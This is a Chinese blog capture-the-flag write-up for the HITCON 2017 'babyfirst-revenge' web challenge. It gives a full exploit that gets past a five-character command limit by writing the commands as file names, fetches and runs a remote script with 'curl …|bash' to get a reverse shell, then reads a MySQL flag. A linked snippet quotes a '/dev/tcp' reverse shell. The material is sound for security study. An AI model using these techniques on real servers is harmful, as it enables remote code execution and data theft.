HITCON2017-Web-writeup

最新推荐文章于 2024-09-07 21:31:01 发布
原创 最新推荐文章于 2024-09-07 21:31:01 发布 · 1.9k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#CTF

本文详细解析了HITCON2017 Web挑战赛中babyfirst-revenge题目的解决过程,包括利用命令注入漏洞获取有限长度命令执行权限,通过精心构造命令序列实现逆向shell连接,以及在目标服务器上发现并读取隐藏的MySQL数据库中的flag。

HITCON2017-Web-writeup

Problems

babyfirst-revenge

Description:

<?php
    $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']);
    @mkdir($sandbox);
    @chdir($sandbox);
    if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 5) {
        @exec($_GET['cmd']);
    } else if (isset($_GET['reset'])) {
        @exec('/bin/rm -rf ' . $sandbox);
    }
    highlight_file(__FILE__);

From the description, we know that @exec($_GET[‘cmd’]) can be used to get shell, but the length of each command has to be <= 5.

My idea is:

  1. Prepare a service nc -lvp 8080 in WAN;
  2. Prepare a reverse shell text in our own server;
  3. Get reverse shell from our own server;

How to get the reverse shell from our own server? We can follow this idea:

curl aabbcccc.cn|bash

Put the command above into a file g on the game’s server, and then use sh g to execute.

How to put the file?
Generate a few files with specific names, use \ to connect them, then

ls -t>g

How to generate?

>name

How to execute ls -t>g?
In the same way, put it into a file _.

# "ls" > _, " -t>g" >> _
# ls\
#  \
# -t\
# >g
>ls\\
ls>_
>\ \\
>-t\\
>\>g
ls>>_

Tips: the order in CentOS’s default shell is different from php, which use LC_COLLATE=C.

Get shell in the same way:

>sh
>ba\\
>\|\\
>cn\\
>c.\\
>cc\\
>bc\\
>bb\\
>aa\\
>\ \\
>rl\\
>cu\\

Execute:

sh _
sh g

Exp:

import requests
from urllib import quote

url = 'http://117.50.3.97:8001/'

payload = [
    '>ls\\\\',
    'ls>_',
    '>\ \\\\',
    '>-t\\\\',
    '>\>g',
    'ls>>_',
    '>sh',
    '>ba\\\\',
    '>\|\\\\',
    '>cn\\\\',
    '>c.\\\\',
    '>cc\\\\',
    '>bc\\\\',
    '>bb\\\\',
    '>aa\\\\',
    '>\ \\\\',
    '>rl\\\\',
    '>cu\\\\',
    'sh _',
    'sh g'
]

res = requests.get(url + '?reset=')
for cmd in payload:
    x = url + '?cmd=' + quote(cmd)
    print(x)
    res = requests.get(x)

Tips:

  1. file .xx will not appear in ls -t, because it will be hidden;
  2. |, ’ '(blank) need \ in shell;
  3. \ in python need one more;

After get the reverse shell, we find a folder fl4444g in /home and there is a README.txt in fl4444g, which shows:

Flag is in the MySQL database
fl4444g / SugZXUtgeJ52_Bvr

Connect mysql:

mysql -ufl4444g -pSugZXUtgeJ52_Bvr

Show databases:

show databases;
s;
ERROR 1064 (42000) at line 2: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 's' at line 1
Database
information_schema
fl4gdb

Show tables:

use fl4gdb;
show tables;
s;
ERROR 1064 (42000) at line 3: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 's' at line 1
Tables_in_fl4gdb
Tables_in_fl4gdb
this_is_the_fl4g

Dump:

use fl4gdb;
select * from this_is_the_fl4g;
s;
ERROR 1064 (42000) at line 3: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 's' at line 1
secret
flag{bf4a0a1a-226c-4e20-b3a1-0398ba83278f}

The database’s interaction is not friendly, which make me to think that there are some problems to connect.

hitcon_2017_ssrfme
o3Ev的博客
05-02 494
hitcon_2017_ssrfme 题目: 打开环境,得到: <?php $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]); @mkdir($sandbox); @chdir($sandbox); $data = shell_exec("GET " . escapeshellarg($_GET["url"])); $info = pathinfo($_GET["file
i春秋CTF ssrfme (peal函数中get命令漏洞)命令执行 详细题解+原理 学习过程
AAAAAAAAAAAA66的博客
12-16 1815
前几天刚做一道命令执行的题目累的够呛,这会刷题又碰见一道,所以做个总结,梳理一下自己学到的各方面知识。 题目 分析 <?php $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]); @mkdir($sandbox); @chdir($sandbox); $data = shell_exec("GET " . escapeshellarg($_GET["url"]));
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理.....................................................................................................................................................................................................................
HITCON-Training-Writeup
baikeng3674的博客
03-14 666
HITCON-Training-Writeup 原文链接M4x@10.0.0.55 项目地址M4x's github,欢迎star~ 更新时间5月16 复习一下二进制基础,写写HITCON-Training的writeup,题目地址:https://github.com/scwuaptx/HITCON-Training Outline Basic Knowledge In...
2022-HitCon-Web-yeeclass WP
qq_66748496的博客
12-27 2857
复现平台靶机为一个完整类论坛网页,题目给了服务端完整代码。
HITCON-Training-Writeup:https的简要说明
04-29
cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh 大纲 基础知识 介绍 逆向工程 静态分析 动态分析 开发 有用的工具 IDA PRO 广发银行 Pwntool 实验1-sysmagic 部分 编译,链接,组装 执行 ...
HITCON2022--ctf驱动逆向题
m0_64973256的博客
12-28 1367
当用户传入0x222080的时候,驱动进入这个分支,如果数组byte_140013190里的8个值均为1,则会跳转到LABEL_21,很显然,这里验证的内容是dword_140003000的开头是否是hitcon,这说明这里会出现flag。于是经过一番倒腾测试,发现执行一个函数,只有最后一个函数能执行下去,能行,一定是顺序问题,经过又一番测试,得到最终测试顺序,这大概是某种保护手段,阻碍静态分析,真正的函数是运行中动态生成的(实测,异或这两轮的结果并不是可执行的代码)
HITCON2017 babyfirst-revenge v2
forbidd3n,keep going
05-22 695
被5虐过后,现在到4了,没想到难度大很多,这些就记一下总结下来的方法和姿势。先总结ls -t的方法,后面再补充tar的姿势。 1、构造ls -t 在上一题中我们大概知道了构造ls -t的要素,但是在本题中,由于长度的进一步限制,`ls>>_`将无法使用。这就要使用到其他技巧。 技巧0:* 在当前工作目录下使用*命令,会将目录名当作命令执行(顺序) 执行*即-t ...
Hitcon2017 babyfirst-revenge复现
0verWatch的博客
09-06 3046
前言 开学了还是得学习的,复现一波题目来玩玩,其实是实力不够不能去打网鼎杯emmm 正文 先从Hitcon2017 babyfirst-revenge这一个题目,总结一下还是学到很多东西的 复现地址 https://github.com/Pr0phet/hitconDockerfile/tree/master/hitcon-ctf-2017/babyfirst-revenge 这是题目回...
还原HITCON 2016一道web题(php反序列化漏洞)
洞若观火
07-27 3478
实验环境搭建:PHPstudy,火狐(backbar),notepad++; 原题目代码:https://github.com/orangetw/My-CTF-Web-Challenges/tree/master/hitcon-ctf-2016/babytrick 本人在还原此题目时,因为mysql数据库用户名密码和方便调试等原因对源码的一些参数做了一些相应的改动,但是没有改变主要代码。 c...
[HITCON 2017]SSRFme
K1ose的博客
03-24 262
访问页面,代码审计; <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_ADDR'] = $http_x_headers[0]; } echo $_SERVER["REMOTE_ADDR"]; $sandbox =
2017 hitcon Ssrf_me 详解 (perl脚本中GET open漏洞及解析漏洞)
a3320315的博客
12-15 1953
0x01 源码 http://117.50.3.97:8004/ <?php $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]); @mkdir($sandbox); @chdir($sandbox); $data = shell_exec("GET " . escapesh...
HITCON 2017 babyfirst-revenge(命令执行绕过二)
郁离歌丶的博客
04-30 1105
昨天不知道怎么了忘记发出去了,和今天的合起来一起发23333333今天国赛,体验了一把被二进制大手子带飞的感觉。贼爽。web1太简单,web2太难,web+pwn我就没做出来过。然后国赛也成为二进制的舞台了(就好像什么比赛不是二进制的天下一样。所以我这只狗又来学web了。接上昨天的,我想本地搭一个,但是想了好久,到底怎么弄,我想看看实现好的环境。搜一波发现有人用docker搭过了。但是我是win1...
HITCON 2017 babyfirst-revenge(命令执行绕过四)
郁离歌丶的博客
05-03 784
中午睡了一觉,醒来两点多了,发现几个群里又有人在黑我这个萌新菜比了.....然后用两个多小时ak了iscc放的题,这让我忍不住再次喷一波iscc...老子都ak了排名还5、60名...就因为昨天写红帽杯要交的wp没打....我真tm无语...算了算了不喷了。开始今天的修炼!在远程放好如下内容:bash -c "bash -i &gt;&amp; /dev/tcp/vpsip/vpsport 0&l...
ISCC2024web-这题我出不了了
m0_64764890的博客
09-07 602
3.结合waf的缺陷以及对mysql和PostgreSQL的使用分析,猜测这段代码可能存在Sql-so-hard漏洞,在网上查询相关的信息,发现针对该漏洞构造的payload,使用博客中的构造的payload对目标发起攻击,成功将flag反弹到自己的服务器上。2.观察代码中waf防护的功能,发现这段waf的防护能力较弱,以简单固定的黑名单过滤为主,对许多类型的攻击并不能发挥有效的防护作用。将nc命令连接 的ip和端口换成自己的公网服务器的ip以及监听的端口。作者名称:Pr0ph3t。
关于BMZCTF hitcon_2017_ssrfme的解法
永远是少年
01-12 1076
在BMZCTF中,有一道题是hitcon_2017_ssrfme
[HITCON 2017]SSRFme 1
最新发布
03-30
### HITCON 2017 SSRF Challenge Overview The **HITCON 2017 CTF** featured a variety of challenges, including those related to Server-Side Request Forgery (SSRF). These challenges were designed to test...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值